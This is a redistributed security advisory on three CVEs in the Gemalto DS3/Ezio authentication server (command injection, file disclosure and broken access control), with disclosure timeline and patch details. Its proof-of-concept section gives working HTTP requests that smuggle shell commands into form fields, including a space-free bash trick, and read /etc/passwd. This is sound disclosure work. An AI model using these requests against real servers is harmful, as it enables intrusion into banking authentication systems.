Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2019.1642
Multiple Vulnerabilities in Gemalto (Thales Group) DS3
Authentication Server / Ezio Server
10 May 2019
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Gemalto DS3 Authentication Server / Ezio Server
Publisher: SEC Consult
Operating System: Linux variants
Impact/Access: Execute Arbitrary Code/Commands -- Existing Account
Access Confidential Data -- Existing Account
Unauthorised Access -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2019-9158 CVE-2019-9157 CVE-2019-9156
CVE-2019-915
Original Bulletin:
https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-gemalto-thales-group-ds3-authentication-server-ezio-server/
- --------------------------BEGIN INCLUDED TEXT--------------------
Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server /
Ezio Server
o Home
o Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication
Server / Ezio Server
[]
Project Description
SEC Consult identified multiple vulnerabilities within the DS3 Authentication
Server (now called Gemalto Ezio Server, part of the Thales Group) which can be
chained together to allow a low-privileged application user to upload a JSP web
shell with the access rights of a low privileged Linux system user.
- -------------------------------------------------------------------------------
Vendor description
DS3 Authentication Server is an appliance that provides authentication and
end-to-end encryption for online banking and remote transactions. DS3 has been
acquired by Gemalto, and the Authentication Server is now known as the Gemalto
Ezio Server. Gemalto is now part of the Thales Group.
Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source: https://www.thalesgroup.com/en/group/journalist/press-release/
thales-completes-acquisition-gemalto-become-global-leader-digital
Business recommendation
The vendor provides a patch and users of this product are urged to upgrade to
the latest version available.
An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.
Vulnerability overview/description
The DS3 Authentication Server is prone to several security issues as described
below that when combined, allows a low-privileged application user to upload a
JSP web shell with the access rights of the lower privileged Linux system user
"asadmin".
The CVSSv3 scores have been provided by the vendor.
1) Semi-Blind OS Command Injection (Post-authenticated)
o CVE-2019-9156
o CWE-78
o CVSSv3: 6.8 (Medium) - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/
AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
The DS3 Authentication Server provides several administration tools to perform
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an
attacker to execute arbitrary commands on the server side with the privileges
of the local system user "asadmin".
2) Limited Local File Disclosure (LFD) (Post-authenticated)
o CVE-2019-9157
o CWE-538
o CVSSv3: 5.7 (Medium) - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/
AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several administration tools to check
the system's access and error logs. "TailLogs.jsp" does not correctly validate
the user input for the "LOG_TYPE" parameter, allowing an attacker to read
arbitrary local files with the privileges of the local system user "asadmin".
3) Broken Access Control (Post-authenticated)
o CVE-2019-9158
o CWE-284
o CVSSv3: 5.7 (Medium) - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/
AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several permission groups, granting
different levels of privileges, from the administrative "dsssAdmin" group to
the low privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see
more functions in the menu of the web portal than a user with the "READ_ONLY"
group. However, the user with the "READ_ONLY" group can access some "dsssAdmin"
functions by replaying the POST or GET request directly.
Proof of concept
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)
This POC was performed using a user with the "READ_ONLY" group permission.
This exploit also has the following two restrictions:
1. The bash commands injected cannot contain any space (' '/%20).
2. The output of the bash commands injected must be null or cannot contain any
space (' '/%20). However, the tester was able to create complex bash
commands payload without any space (' '/%20) by using a bash trick.
The simple OS command payload "whoami" injected into the HOST_NAME parameter
and the HTTP response with the result of the payload asadmin mixed in. Please
note that the OS command payload is enclosed with the `` characters.
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
CSRFTOKEN=&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 12987
...
<textarea cols="80" name="TEST_RESULTS" readonly="readonly" rows="10">Start time : ... SGT 2019
End time : ... SGT 2019
Time taken (ms): 3
Attempting connection to 127.0.0.1`whoami` on port 8443
...
127.0.0.1asadmin/8443: Temporary failure in name resolution
Error connecting to 127.0.0.1`whoami` on port 8443
Successful connection to 127.0.0.1`whoami` on port 8443
</textarea>
...
The complex bash command payload without any space (' '/%20) representing ls -1
| tail -1 injected into the PORT_NUMBER parameter and the HTTP response with
the result of the payload liquibase.out mixed in. Please note that the OS
command payload is enclosed with the `` characters.
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 173
CSRFTOKEN=&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 13159
...
<textarea cols="80" name="TEST_RESULTS" readonly="readonly" rows="10">Start time : ... SGT 2019
End time : ... SGT 2019
Time taken (ms): 8
Attempting connection to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
127.0.0.1/8443liquibase.out: Servname not supported for ai_socktype
Error connecting to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
Successful connection to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
</textarea>
...
2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)
This POC was performed using an admin user with the dsssAdmin group permission,
as the ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility function
is not accessible to users with the READ_ONLY group permission.
This exploit has the following two restrictions:
1. Only the last 10 lines of the file are displayed.
2. Directory traversal was not allowed, as the parameter cannot contain two
dot (.) characters.
However, the tester was able to bypass the directory traversal restriction by
injecting the arbitrary filename as another argument, rather than to modify the
first argument.
The file /etc/passwd injected into the LOG_TYPE parameter and the response with
the last 10 lines of the file returned. Please note that the injected filename
is preceded with the + character.
GET /ServerAdmin/TailLogs.jsp-LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN=<csrf_token> HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Content-Length: 3702
Server: DS3-AuthServer
...
<TR Border=0 Align="LEFT">
<TD COLSPAN=2>
<TEXTAREA READONLY ROWS="20" COLS="80" NAME="TAIL_LOGS">
==> /home/data/log/ <== ==> /etc/passwd <== ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mysql:x:501:501::/home/mysql:/sbin/nologin asadmin:x:502:502::/home/asadmin:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin hacluster:x:498:503::/var/lib/heartbeat/cores/hacluster:/sbin/nologin haproxy:x:503:504::/home/haproxy:/sbin/nologin
</TEXTAREA>
</TD>
...
3) Broken Access Control (Post-authenticated) (CVE-2019-9158)
The admin user with the "dsssAdmin" group permission is able to access the
following chain of functions in the menu of the web portal.
o ADMINISTRATION -> Log Manager -> View Log
o ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility
The user with the READ_ONLY group permission is not able to access the
following chain of function in the menu of the web portal.
o ADMINISTRATION -> Log Manager -> View Log
Based on the web portal, a user with the "READ_ONLY" group permission should
also not be able to access the following chain of function.
o ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility
However, it was noted that a user with the READ_ONLY group permission is able
to access the Tail Logs Utility function with the GET request (captured from
the dsssAdmin user's request) directly with the READ_ONLY user's session cookie
and CSRFTOKEN token.
https://$IP/ServerAdmin/TailLogs.jsp-LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=<csrf_token>">https://$IP/ServerAdmin/TailLogs.jsp-LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=
Vulnerable / tested versions
The following version has been tested and found to be vulnerable:
o 2.6.1-SP01
The following version was confirmed to be vulnerable by the vendor:
o All versions earlier than v3.1.0
Vendor contact timeline
2019-02-27 Contacting vendor through csirt@gemalto.com (Gemalto CERT)
Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server
2019-03-08 version 2.8.0-update01 and earlier. Requested 2 months disclosure
embargo period to implement fix for future release.
Gemalto CERT confirmed the fix for the reported vulnerabilities to
2019-03-22 be included in current sprint and provided CVSSv3 scoring and CWE
assigned.
2019-03-22 Provided Gemalto CERT with attacker-centric CVSSv3 metrics.
2019-04-05 Gemalto CERT provided updated CVSSv3 metrics.
Gemalto CERT informed that the fix for the 3 vulnerabilities was
2019-04-18 planned in the upcoming of Ezio DS3 server v3.1.0 release by 1st
week of May, and asked for extension of embargo period.
Furthermore, Gemalto is now part of the Thales Group.
2019-05-06 Patches available
2019-05-09 Coordinated release of security advisory.
Solution
According to the vendor the patches are provided to the Support Team L2 and
Professional Services team and those teams will get in touch with the technical
contacts of the customers. The update will also be announced via a future
newsletter.
Furthermore, SEC Consult have been informed that the branch 2.x of Ezio DS3
server is not fixed yet and a patch will be available at a later date. However,
customers are reminded about deployment guidelines to reduce their attack
surface.
Workaround
As the vulnerabilities need authentication with valid credentials to the
portal, it is recommended to deploy the application in a trusted zone and
should be restricted to the customer's internal secure network.
Advisory URL
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
EOF TING Meng Yean / @2019
Interested to work with the experts of SEC Consult- Send us your application.
Want to improve your own cyber security with the experts of SEC Consult-
Contact our local offices.
Project Details
o TitleMultiple vulnerabilities
o ProductGemalto (Thales Group) DS3 Authentication Server / Ezio Server
o Vulnerable versionEzio DS3 server <v3.1.0
o Fixed versionEzio DS3 server v3.1.0
o CVE numberCVE-2019-9156, CVE-2019-9157, CVE-2019-9158
o ImpactMedium
o Homepagehttps://www.gemalto.com
o Found2019-02-11
o ByTING Meng Yean (Office Singapore) | SEC Consult Vulnerability Lab
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBXNTeW2aOgq3Tt24GAQgfdg//RkOsRm5dHz16yT0bhgpmESRVeh5hm6rV
eJQJQ01ZCgts+6Pg3kKBgYY7vpybVvOEO5ke96TOoypMY6PBN/NPQ1ffkCCFK6k0
Uw0hSiya8XU+We8m86qbtBa/jxYsBW6r86GXRcc5KBEHDO7Cv1dcOZtT4Fq5b13i
/LtB6Wg1ZJxxFl1E14LT9ySH9CFDt5eER+Vo7jYbM83X9fxyuP4umGr9aUUifB/H
YuUvMjBWd6iKnojtnDvXTdhrmaTEe+n75//5i3h1hT43mi4RCmRwegduxdo+o59n
pZV1YaJZlA4ZtJjXU+a2tTXs4/HaRQh0fpCbP5J/DNLGKKdKAfrJroVeTKMbT1X7
J454cQq/+HvM80ncln/73Sc93JPtU4v/NBRykSNjM5eo+aLKTcI0IcKiVXCYFgJn
RDO1iQ1iwCVNObNWrY2/3oABzRZtBmW9ju2v4bxZBi6jf6gorw+DmSAwsVhNPl5F
ObWJfw3ImJ82oU1OUGE76Or6tkiIvBQYP96D7m/6kVjPnUnbEzfPUJZQItDXStSG
5EO0rYZgXkxj9UaLmTflpfrZQGEa147rJllK24PQW4vKw/9Sx+xZi/2IGgWkRhop
bNHOI3OlZA2rWXsaQUftvVaWxrBXJxZiR8wknisaN4f8L/oTjhyAoiP3Eda9xPOE
GLmsebBbZpk=
=oHil
-----END PGP SIGNATURE-----